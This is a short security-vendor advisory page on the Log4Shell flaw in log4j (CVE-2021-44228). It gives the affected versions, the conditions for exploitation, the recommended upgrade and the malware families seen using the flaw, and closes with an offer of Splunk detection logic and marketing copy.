Log4Shell Vulnerability

Log4Shell Vulnerability

Detection Strategies

CVE-2021-44228 / Log4Shell Vulnerability

Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List

 A zero-day exploit has been identified for Java logging library "log4j" that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1 with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others. The exploit requires three components a vulnerable log4j version, any protocol that enables the attack to send the exploit string, and a log statement that can log the string from the request. Mitigation is available through an update with affected users recommended to update to log4j version "log4j-2.15.0-rc2". Threat researchers have identified a variety of threats Kinsing (cryptocurrency miner), Mirai Malware, Cobalt Strike, a new unidentified ransomware strain, and likely others, yet to be identified, taking advantage of the widespread vulnerability.

**For updates, detection content & logic, attack flow, threat examples & use case demonstrations - Check out our Log4Shell blog We're here to help by providing ready-to-deploy detection code (no strings attached) just reach out and we’ll send you the Splunk (SPL) detection logic, contact: detection.support@anvilogic.com 

Chat with our team to receive a free maturity assessment

Get in Touch

You May Also Like

Ready to learn more about Anvilogic?

Kickstart your security operations

Anvilogic provided the necessary threat detection automation for our small SOC, adding a significant force-multiplier advantage for my team.